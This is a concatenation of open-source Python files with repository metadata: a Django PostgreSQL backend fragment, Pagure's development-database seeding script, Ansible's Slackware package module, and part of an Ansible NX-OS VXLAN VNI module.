psycopg2.extensions.register_adapter(SafeBytes, psycopg2.extensions.QuotedString)
psycopg2.extensions.register_adapter(SafeText, psycopg2.extensions.QuotedString)
def utc_tzinfo_factory(offset):
if offset != 0:
raise AssertionError("database connection isn't set to UTC")
return utc
class DatabaseFeatures(BaseDatabaseFeatures):
needs_datetime_string_cast = False
can_return_id_from_insert = True
requires_rollback_on_dirty_transaction = True
has_real_datatype = True
can_defer_constraint_checks = True
has_select_for_update = True
has_select_for_update_nowait = True
has_bulk_insert = True
uses_savepoints = True
supports_tablespaces = True
supports_transactions = True
can_introspect_ip_address_field = True
can_introspect_small_integer_field = True
can_distinct_on_fields = True
can_rollback_ddl = True
supports_combined_alters = True
nulls_order_largest = True
closed_cursor_error_class = InterfaceError
has_case_insensitive_like = False
requires_sqlparse_for_splitting = False
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
pattern_ops = {
'startswith': "LIKE %s || '%%%%'",
'istartswith': "LIKE UPPER(%s) || '%%%%'",
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
# None may be used to connect to the default 'postgres' db
if settings_dict['NAME'] == '':
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
conn_params = {
'database': settings_dict['NAME'] or 'postgres',
}
conn_params.update(settings_dict['OPTIONS'])
if 'autocommit' in conn_params:
del conn_params['autocommit']
if 'isolation_level' in conn_params:
del conn_params['isolation_level']
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
def get_new_connection(self, conn_params):
connection = Database.connect(**conn_params)
# self.isolation_level must be set:
# - after connecting to the database in order to obtain the database's
# default when no value is explicitly specified in options.
# - before calling _set_autocommit() because if autocommit is on, that
# will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT;
# and if autocommit is off, on psycopg2 < 2.4.2, _set_autocommit()
# needs self.isolation_level.
options = self.settings_dict['OPTIONS']
try:
self.isolation_level = options['isolation_level']
except KeyError:
self.isolation_level = connection.isolation_level
else:
# Set the isolation level to the value from OPTIONS. This isn't
# needed on psycopg2 < 2.4.2 because it happens as a side-effect
# of _set_autocommit(False).
if (self.isolation_level != connection.isolation_level and
self.psycopg2_version >= (2, 4, 2)):
connection.set_session(isolation_level=self.isolation_level)
return connection
def init_connection_state(self):
settings_dict = self.settings_dict
self.connection.set_client_encoding('UTF8')
tz = 'UTC' if settings.USE_TZ else settings_dict.get('TIME_ZONE')
if tz:
try:
get_parameter_status = self.connection.get_parameter_status
except AttributeError:
# psycopg2 < 2.0.12 doesn't have get_parameter_status
conn_tz = None
else:
conn_tz = get_parameter_status('TimeZone')
if conn_tz != tz:
cursor = self.connection.cursor()
try:
cursor.execute(self.ops.set_time_zone_sql(), [tz])
finally:
cursor.close()
# Commit after setting the time zone (see #17062)
if not self.get_autocommit():
self.connection.commit()
def create_cursor(self):
cursor = self.connection.cursor()
cursor.tzinfo_factory = utc_tzinfo_factory if settings.USE_TZ else None
return cursor
def _set_isolation_level(self, isolation_level):
assert isolation_level in range(1, 5) # Use set_autocommit for level = 0
if self.psycopg2_version >= (2, 4, 2):
self.connection.set_session(isolation_level=isolation_level)
else:
self.connection.set_isolation_level(isolation_level)
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
if self.psycopg2_version >= (2, 4, 2):
self.connection.autocommit = autocommit
else:
if autocommit:
level = psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT
else:
level = self.isolation_level
self.connection.set_isolation_level(level)
def check_constraints(self, table_names=None):
"""
        To check constraints, we set constraints to immediate. Then, when we're done, we must ensure they
are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
self.connection.cursor().execute("SELECT 1")
except Database.Error:
return False
else:
return True
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
return DatabaseSchemaEditor(self, *args, **kwargs)
@cached_property
def psycopg2_version(self):
version = psycopg2.__version__.split(' ', 1)[0]
return tuple(int(v) for v in version.split('.'))
@cached_property
def pg_version(self):
with self.temporary_connection():
return get_version(self.connection)
| apache-2.0 | -6,457,968,663,639,534,000 | 37.58952 | 105 | 0.636641 | false |
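# Minimal sketch (not from the original file) of the DATABASES entry that
# drives this backend; get_connection_params() above reads NAME, USER,
# PASSWORD, HOST, PORT and OPTIONS.  All concrete values are invented
# placeholders.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'mydb',
        'USER': 'myuser',
        'PASSWORD': 'secret',
        'HOST': 'localhost',
        'PORT': '5432',
        'OPTIONS': {
            'isolation_level': psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED,
        },
    }
}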
pypingou/pagure | dev-data.py | 1 | 21989 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Populate the pagure db with some dev data. """
from __future__ import print_function, unicode_literals, absolute_import
import argparse
import os
import tempfile
import pygit2
import shutil
import six
from sqlalchemy import create_engine, MetaData
import pagure
import tests
import pagure.lib.model
import pagure.lib.query
from pagure.lib.login import generate_hashed_value
from pagure.lib.model import create_default_status
from pagure.lib.repo import PagureRepo
'''
Usage:
python dev-data.py --init
python dev-data.py --clean
python dev-data.py --populate
python dev-data.py --all
'''
_config = pagure.config.reload_config()
def empty_dev_db(session):
print('')
print('WARNING: Deleting all data from', _config['DB_URL'])
response = os.environ.get("FORCE_DELETE")
if not response:
response = six.moves.input('Do you want to continue? (yes/no) ')
if response.lower().startswith('y'):
tables = reversed(pagure.lib.model_base.BASE.metadata.sorted_tables)
for tbl in tables:
session.execute(tbl.delete())
else:
exit("Aborting.")
def insert_data(session, username, user_email):
_config['EMAIL_SEND'] = False
_config['TESTING'] = True
######################################
# tags
item = pagure.lib.model.Tag(
tag='tag1',
)
session.add(item)
session.commit()
######################################
# Users
# Create a couple of users
pingou = item = pagure.lib.model.User(
user='pingou',
fullname='PY C',
password=generate_hashed_value(u'testing123'),
token=None,
default_email='[email protected]',
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
foo = item = pagure.lib.model.User(
user='foo',
fullname='foo bar',
password=generate_hashed_value(u'testing123'),
token=None,
default_email='[email protected]',
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
you = item = pagure.lib.model.User(
user=username,
fullname=username,
password=generate_hashed_value(u'testing123'),
token=None,
default_email=user_email,
)
session.add(item)
session.commit()
print("User created: {} <{}>, {}".format(item.user, item.default_email, 'testing123'))
######################################
# pagure_group
item = pagure.lib.model.PagureGroup(
group_name='admin',
group_type='admin',
user_id=pingou.id,
display_name='admin',
description='Admin Group',
)
session.add(item)
session.commit()
print('Created "admin" group. Pingou is a member.')
# Add a couple of groups so that we can list them
item = pagure.lib.model.PagureGroup(
group_name='group',
group_type='user',
user_id=pingou.id,
display_name='group group',
description='this is a group group',
)
session.add(item)
session.commit()
print('Created "group" group. Pingou is a member.')
item = pagure.lib.model.PagureGroup(
group_name='rel-eng',
group_type='user',
user_id=pingou.id,
display_name='Release Engineering',
description='The group of release engineers',
)
session.add(item)
session.commit()
print('Created "rel-eng" group. Pingou is a member.')
######################################
# projects
import shutil
# delete folder from local instance to start from a clean slate
if os.path.exists(_config['GIT_FOLDER']):
shutil.rmtree(_config['GIT_FOLDER'])
# Create projects
item = project1 = pagure.lib.model.Project(
user_id=pingou.id,
name='test',
is_fork=False,
parent_id=None,
description='test project #1',
hook_token='aaabbbccc',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
session.flush()
tests.create_locks(session, item)
item = project2 = pagure.lib.model.Project(
user_id=pingou.id,
name='test2',
is_fork=False,
parent_id=None,
description='test project #2',
hook_token='aaabbbddd',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
item = project3 = pagure.lib.model.Project(
user_id=pingou.id,
name='test3',
is_fork=False,
parent_id=None,
description='namespaced test project',
hook_token='aaabbbeee',
namespace='somenamespace',
)
item.close_status = ['Invalid', 'Insufficient data', 'Fixed', 'Duplicate']
session.add(item)
session.commit()
tests.create_projects_git(_config['GIT_FOLDER'], bare=True)
add_content_git_repo(
os.path.join(_config['GIT_FOLDER'], 'test.git'))
tests.add_readme_git_repo(
os.path.join(_config['GIT_FOLDER'], 'test.git'))
# Add some content to the git repo
add_content_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'))
tests.add_readme_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'))
tests.add_commit_git_repo(
os.path.join(_config['GIT_FOLDER'], 'forks', 'pingou',
'test.git'), ncommits=10)
######################################
# user_emails
item = pagure.lib.model.UserEmail(
user_id=pingou.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=pingou.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=foo.id,
email='[email protected]')
session.add(item)
item = pagure.lib.model.UserEmail(
user_id=you.id,
email=user_email)
session.add(item)
session.commit()
######################################
# user_emails_pending
email_pend = pagure.lib.model.UserEmailPending(
user_id=pingou.id,
email='[email protected]',
token='abcdef',
)
session.add(email_pend)
session.commit()
######################################
# issues
# Add an issue and tag it so that we can list them
item = pagure.lib.model.Issue(
id=1001,
uid='foobar',
project_id=project1.id,
title='Problem with jenkins build',
content='For some reason the tests fail at line:24',
user_id=pingou.id,
)
session.add(item)
session.commit()
item = pagure.lib.model.Issue(
id=1002,
uid='foobar2',
project_id=project1.id,
title='Unit tests failing',
content='Need to fix code for the unit tests to '
'pass so jenkins build can complete.',
user_id=pingou.id,
)
session.add(item)
session.commit()
item = pagure.lib.model.Issue(
id=1003,
uid='foobar3',
project_id=project1.id,
title='Segfault during execution',
content='Index out of bounds for variable i?',
user_id=you.id,
)
session.add(item)
session.commit()
######################################
# pagure_user_group
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="rel-eng", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=pingou.id,
group_id=group.id
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="admin", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=you.id,
group_id=group.id
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="group", group_type=None)
item = pagure.lib.model.PagureUserGroup(
user_id=foo.id,
group_id=group.id
)
session.add(item)
session.commit()
######################################
# projects_groups
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="rel-eng", group_type=None)
repo = pagure.lib.query.get_authorized_project(session, 'test')
item = pagure.lib.model.ProjectGroup(
project_id=repo.id,
group_id=group.id,
access="commit"
)
session.add(item)
session.commit()
group = pagure.lib.query.search_groups(session, pattern=None,
group_name="admin", group_type=None)
repo = pagure.lib.query.get_authorized_project(session, 'test2')
item = pagure.lib.model.ProjectGroup(
project_id=repo.id,
group_id=group.id,
access="admin"
)
session.add(item)
session.commit()
######################################
# pull_requests
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fixing code for unittest',
user=username,
status="Open"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='add very nice README',
user=username,
status="Open"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Add README',
user=username,
status="Closed"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fix some containers',
user=username,
status="Merged"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fix pull request statuses',
user=username,
status="Closed"
)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test')
forked_repo = pagure.lib.query.get_authorized_project(session, 'test')
req = pagure.lib.query.new_pull_request(
session=session,
repo_from=forked_repo,
branch_from='master',
repo_to=repo,
branch_to='master',
title='Fixing UI of issue',
user=username,
status="Merged"
)
session.commit()
#####################################
# tokens
tests.create_tokens(session, user_id=pingou.id, project_id=project1.id)
######################################
# user_projects
repo = pagure.lib.query.get_authorized_project(session, 'test')
item = pagure.lib.model.ProjectUser(
project_id=repo.id,
user_id=foo.id,
access="commit"
)
session.add(item)
session.commit()
repo = pagure.lib.query.get_authorized_project(session, 'test2')
item = pagure.lib.model.ProjectUser(
project_id=repo.id,
user_id=you.id,
access="commit"
)
session.add(item)
session.commit()
######################################
# issue_comments
item = pagure.lib.model.IssueComment(
user_id=pingou.id,
issue_uid='foobar',
comment='We may need to adjust the unittests instead of the code.',
)
session.add(item)
session.commit()
######################################
# issue_to_issue
repo = pagure.lib.query.get_authorized_project(session, 'test')
all_issues = pagure.lib.query.search_issues(session, repo)
pagure.lib.query.add_issue_dependency(session, all_issues[0],
all_issues[1], 'pingou')
######################################
# pull_request_comments
user = pagure.lib.query.search_user(session, username='pingou')
# only 1 pull request available atm
pr = pagure.lib.query.get_pull_request_of_user(session, "pingou")[0]
item = pagure.lib.model.PullRequestComment(
pull_request_uid=pr.uid,
user_id=user.id,
comment="+1 for me. Btw, could you rebase before you merge?",
notification=0
)
session.add(item)
session.commit()
######################################
# pull_request_flags
# only 1 pull request available atm
pr = pagure.lib.query.get_pull_request_of_user(session, "pingou")[0]
item = pagure.lib.model.PullRequestFlag(
uid="random_pr_flag_uid",
pull_request_uid=pr.uid,
user_id=pingou.id,
username=pingou.user,
percent=80,
comment="Jenkins build passes",
url=str(pr.id),
status="success"
)
session.add(item)
session.commit()
pr = pagure.lib.query.get_pull_request_of_user(session, "foo")[1]
item = pagure.lib.model.PullRequestFlag(
uid="oink oink uid",
pull_request_uid=pr.uid,
user_id=pingou.id,
username=pingou.user,
percent=80,
comment="Jenkins does not pass",
url=str(pr.id),
status="failure"
)
session.add(item)
session.commit()
######################################
# pull_request_assignee
pr = pagure.lib.query.search_pull_requests(session, requestid='1006')
pr.assignee_id = pingou.id
session.commit()
pr = pagure.lib.query.search_pull_requests(session, requestid='1007')
pr.assignee_id = you.id
session.commit()
pr = pagure.lib.query.search_pull_requests(session, requestid='1004')
pr.assignee_id = foo.id
session.commit()
######################################
# tags_issues
repo = pagure.lib.query.get_authorized_project(session, 'test')
issues = pagure.lib.query.search_issues(session, repo)
item = pagure.lib.model.TagIssue(
issue_uid=issues[0].uid,
tag='tag1',
)
session.add(item)
session.commit()
######################################
# tokens_acls
tests.create_tokens_acl(session)
######################################
# Fork a project
# delete fork data
fork_proj_location = "forks/foo/test.git"
try:
shutil.rmtree(os.path.join(_config['GIT_FOLDER'],
fork_proj_location))
except:
print('git folder already deleted')
try:
shutil.rmtree(os.path.join(_config['DOCS_FOLDER'],
fork_proj_location))
except:
print('docs folder already deleted')
try:
shutil.rmtree(os.path.join(_config['TICKETS_FOLDER'],
fork_proj_location))
except:
print('tickets folder already deleted')
try:
shutil.rmtree(os.path.join(_config['REQUESTS_FOLDER'],
fork_proj_location))
except:
print('requests folder already deleted')
repo = pagure.lib.query.get_authorized_project(session, 'test')
result = pagure.lib.query.fork_project(session, 'foo', repo)
if result == 'Repo "test" cloned to "foo/test"':
session.commit()
def add_content_git_repo(folder, branch='master'):
""" Create some content for the specified git repo. """
if not os.path.exists(folder):
os.makedirs(folder)
brepo = pygit2.init_repository(folder, bare=True)
newfolder = tempfile.mkdtemp(prefix='pagure-tests')
repo = pygit2.clone_repository(folder, newfolder)
# Create a file in that git repo
with open(os.path.join(newfolder, 'sources'), 'w') as stream:
stream.write('foo\n bar')
repo.index.add('sources')
repo.index.write()
parents = []
commit = None
try:
commit = repo.revparse_single(
'HEAD' if branch == 'master' else branch)
except KeyError:
pass
if commit:
parents = [commit.oid.hex]
# Commits the files added
tree = repo.index.write_tree()
author = pygit2.Signature(
'Alice Author', '[email protected]')
committer = pygit2.Signature(
'Cecil Committer', '[email protected]')
repo.create_commit(
'refs/heads/%s' % branch, # the name of the reference to update
author,
committer,
'Add sources file for testing',
# binary string representing the tree object ID
tree,
# list of binary strings representing parents of the new commit
parents,
)
parents = []
commit = None
try:
commit = repo.revparse_single(
'HEAD' if branch == 'master' else branch)
except KeyError:
pass
if commit:
parents = [commit.oid.hex]
subfolder = os.path.join('folder1', 'folder2')
if not os.path.exists(os.path.join(newfolder, subfolder)):
os.makedirs(os.path.join(newfolder, subfolder))
# Create a file in that git repo
with open(os.path.join(newfolder, subfolder, 'file'), 'w') as stream:
stream.write('foo\n bar\nbaz')
repo.index.add(os.path.join(subfolder, 'file'))
repo.index.write()
# Commits the files added
tree = repo.index.write_tree()
author = pygit2.Signature(
'Alice Author', '[email protected]')
committer = pygit2.Signature(
'Cecil Committer', '[email protected]')
repo.create_commit(
'refs/heads/%s' % branch, # the name of the reference to update
author,
committer,
'Add some directory and a file for more testing',
# binary string representing the tree object ID
tree,
# list of binary strings representing parents of the new commit
parents
)
# Push to origin
ori_remote = repo.remotes[0]
master_ref = repo.lookup_reference(
'HEAD' if branch == 'master' else 'refs/heads/%s' % branch).resolve()
refname = '%s:%s' % (master_ref.name, master_ref.name)
PagureRepo.push(ori_remote, refname)
shutil.rmtree(newfolder)
def _get_username():
invalid_option = ['pingou', 'foo']
user_name = os.environ.get("USER_NAME")
if not user_name:
print("")
user_name = six.moves.input(
"Enter your username so we can add you into the test data: ")
cnt = 0
while not user_name.strip() or user_name in invalid_option:
print("Reserved names: " + str(invalid_option))
user_name = six.moves.input(
"Enter your username so we can add you into the "
"test data: ")
cnt += 1
if cnt == 4:
print("We asked too many times, bailing")
sys.exit(1)
return user_name
def _get_user_email():
invalid_option = ['[email protected]', '[email protected]']
user_email = os.environ.get("USER_EMAIL")
if not user_email:
print("")
user_email = six.moves.input("Enter your user email: ")
cnt = 0
while not user_email.strip() or user_email in invalid_option:
print("Reserved names: " + str(invalid_option))
user_email = six.moves.input("Enter your user email: ")
cnt += 1
if cnt == 4:
print("We asked too many times, bailing")
sys.exit(1)
return user_email
if __name__ == "__main__":
desc = "Run the dev database initialization/insertion/deletion " \
"script for db located " + str(_config['DB_URL'])
parser = argparse.ArgumentParser(prog="dev-data", description=desc)
parser.add_argument('-i', '--init', action="store_true",
help="Create the dev db")
parser.add_argument('-p', '--populate', action="store_true",
help="Add test data to the db")
parser.add_argument('-d', '--delete', action="store_true",
help="Wipe the dev db")
parser.add_argument('-a', '--all', action="store_true",
help="Create, Populate then Wipe the dev db")
args = parser.parse_args()
# forcing the user to choose
if not any(vars(args).values()):
parser.error('No arguments provided.')
session = None
if args.init or args.all:
session = pagure.lib.model.create_tables(
db_url=_config["DB_URL"],
alembic_ini=None,
acls=_config["ACLS"],
debug=False)
print("Database created")
if args.populate or args.all:
if not session:
session = pagure.lib.query.create_session(_config['DB_URL'])
user_name = _get_username()
user_email = _get_user_email()
insert_data(session, user_name, user_email)
if args.delete or args.all:
empty_dev_db(session)
| gpl-2.0 | -3,777,202,079,627,342,000 | 29.246217 | 90 | 0.576743 | false |
simonwydooghe/ansible | lib/ansible/modules/packaging/os/slackpkg.py | 95 | 6148 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Kim Nørgaard
# Written by Kim Nørgaard <[email protected]>
# Based on pkgng module written by bleader <[email protected]>
# that was based on pkgin module written by Shaun Zinck <shaun.zinck at gmail.com>
# that was based on pacman module written by Afterburn <https://github.com/afterburn>
# that was based on apt module written by Matthew Williams <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: slackpkg
short_description: Package manager for Slackware >= 12.2
description:
- Manage binary packages for Slackware using 'slackpkg' which
is available in versions after 12.2.
version_added: "2.0"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package, you can use "installed" as an alias for C(present) and removed as one for C(absent).
choices: [ 'present', 'absent', 'latest' ]
required: false
default: present
update_cache:
description:
- update the package database first
required: false
default: false
type: bool
author: Kim Nørgaard (@KimNorgaard)
requirements: [ "Slackware >= 12.2" ]
'''
EXAMPLES = '''
# Install package foo
- slackpkg:
name: foo
state: present
# Remove packages foo and bar
- slackpkg:
name: foo,bar
state: absent
# Make sure that it is the most updated package
- slackpkg:
name: foo
state: latest
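# Illustrative sketch: refresh the package database before ensuring a
# package is present ("foo" is a placeholder name)
- slackpkg:
    name: foo
    state: present
    update_cache: true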
'''
from ansible.module_utils.basic import AnsibleModule
def query_package(module, slackpkg_path, name):
import glob
import platform
machine = platform.machine()
packages = glob.glob("/var/log/packages/%s-*-[%s|noarch]*" % (name,
machine))
if len(packages) > 0:
return True
return False
def remove_packages(module, slackpkg_path, packages):
remove_c = 0
    # Use a for loop so that, in case of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, slackpkg_path, package):
continue
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
remove %s" % (slackpkg_path,
package))
if not module.check_mode and query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to remove %s: %s" % (package, out))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, slackpkg_path, packages):
install_c = 0
for package in packages:
if query_package(module, slackpkg_path, package):
continue
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
install %s" % (slackpkg_path,
package))
if not module.check_mode and not query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to install %s: %s" % (package, out),
stderr=err)
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg="present %s package(s)"
% (install_c))
module.exit_json(changed=False, msg="package(s) already present")
def upgrade_packages(module, slackpkg_path, packages):
install_c = 0
for package in packages:
if not module.check_mode:
rc, out, err = module.run_command("%s -default_answer=y -batch=on \
upgrade %s" % (slackpkg_path,
package))
if not module.check_mode and not query_package(module, slackpkg_path,
package):
module.fail_json(msg="failed to install %s: %s" % (package, out),
stderr=err)
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg="present %s package(s)"
% (install_c))
module.exit_json(changed=False, msg="package(s) already present")
def update_cache(module, slackpkg_path):
rc, out, err = module.run_command("%s -batch=on update" % (slackpkg_path))
if rc != 0:
module.fail_json(msg="Could not update package cache")
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default="installed", choices=['installed', 'removed', 'absent', 'present', 'latest']),
name=dict(aliases=["pkg"], required=True, type='list'),
update_cache=dict(default=False, aliases=["update-cache"],
type='bool'),
),
supports_check_mode=True)
slackpkg_path = module.get_bin_path('slackpkg', True)
p = module.params
pkgs = p['name']
if p["update_cache"]:
update_cache(module, slackpkg_path)
if p['state'] == 'latest':
upgrade_packages(module, slackpkg_path, pkgs)
elif p['state'] in ['present', 'installed']:
install_packages(module, slackpkg_path, pkgs)
elif p["state"] in ['removed', 'absent']:
remove_packages(module, slackpkg_path, pkgs)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,681,596,031,009,584,000 | 29.420792 | 120 | 0.563222 | false |
simonwydooghe/ansible | lib/ansible/modules/network/nxos/nxos_vxlan_vtep_vni.py | 8 | 14044 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vxlan_vtep_vni
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Creates a Virtual Network Identifier member (VNI)
description:
- Creates a Virtual Network Identifier member (VNI) for an NVE
overlay interface.
author: Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
    - The keyword 'default', where supported, restores a parameter's default value.
options:
interface:
description:
- Interface name for the VXLAN Network Virtualization Endpoint.
required: true
vni:
description:
- ID of the Virtual Network Identifier.
required: true
assoc_vrf:
description:
- This attribute is used to identify and separate processing VNIs
that are associated with a VRF and used for routing. The VRF
and VNI specified with this command must match the configuration
of the VNI under the VRF.
type: bool
ingress_replication:
description:
- Specifies mechanism for host reachability advertisement.
choices: ['bgp','static', 'default']
multicast_group:
description:
- The multicast group (range) of the VNI. Valid values are
string and keyword 'default'.
peer_list:
description:
- Set the ingress-replication static peer list. Valid values
are an array, a space-separated string of ip addresses,
or the keyword 'default'.
suppress_arp:
description:
- Suppress arp under layer 2 VNI.
type: bool
suppress_arp_disable:
description:
- Overrides the global ARP suppression config.
This is available on NX-OS 9K series running 9.2.x or higher.
type: bool
version_added: "2.8"
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_vxlan_vtep_vni:
interface: nve1
vni: 6000
ingress_replication: default
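# Illustrative sketch combining documented options; the VNI and the peer
# addresses below are placeholder values, not a known-good fabric
- nxos_vxlan_vtep_vni:
    interface: nve1
    vni: 6000
    ingress_replication: static
    peer_list:
      - 192.0.2.1
      - 192.0.2.2
    state: present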
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface nve1", "member vni 6000"]
'''
import re
from ansible.module_utils.network.nxos.nxos import get_config, load_config
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.config import CustomNetworkConfig
BOOL_PARAMS = [
'assoc_vrf',
'suppress_arp',
'suppress_arp_disable',
]
PARAM_TO_DEFAULT_KEYMAP = {
'multicast_group': '',
'peer_list': [],
'ingress_replication': '',
}
PARAM_TO_COMMAND_KEYMAP = {
'assoc_vrf': 'associate-vrf',
'interface': 'interface',
'vni': 'member vni',
'ingress_replication': 'ingress-replication protocol',
'multicast_group': 'mcast-group',
'peer_list': 'peer-ip',
'suppress_arp': 'suppress-arp',
'suppress_arp_disable': 'suppress-arp disable',
}
def get_value(arg, config, module):
command = PARAM_TO_COMMAND_KEYMAP[arg]
command_val_re = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(command), re.M)
if arg in BOOL_PARAMS:
command_re = re.compile(r'\s+{0}\s*$'.format(command), re.M)
value = False
if command_re.search(config):
value = True
elif arg == 'peer_list':
        has_command_val = command_val_re.findall(config)
value = []
if has_command_val:
value = has_command_val
else:
value = ''
        has_command_val = command_val_re.search(config)
if has_command_val:
value = has_command_val.group('value')
return value
def check_interface(module, netcfg):
config = str(netcfg)
has_interface = re.search(r'(?:interface nve)(?P<value>.*)$', config, re.M)
value = ''
if has_interface:
value = 'nve{0}'.format(has_interface.group('value'))
return value
def get_existing(module, args):
existing = {}
netcfg = CustomNetworkConfig(indent=2, contents=get_config(module))
interface_exist = check_interface(module, netcfg)
if interface_exist:
parents = ['interface {0}'.format(interface_exist)]
temp_config = netcfg.get_section(parents)
if 'member vni {0} associate-vrf'.format(module.params['vni']) in temp_config:
parents.append('member vni {0} associate-vrf'.format(module.params['vni']))
config = netcfg.get_section(parents)
elif "member vni {0}".format(module.params['vni']) in temp_config:
parents.append('member vni {0}'.format(module.params['vni']))
config = netcfg.get_section(parents)
else:
config = {}
if config:
for arg in args:
if arg not in ['interface', 'vni']:
existing[arg] = get_value(arg, config, module)
existing['interface'] = interface_exist
existing['vni'] = module.params['vni']
return existing, interface_exist
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = value
return new_dict
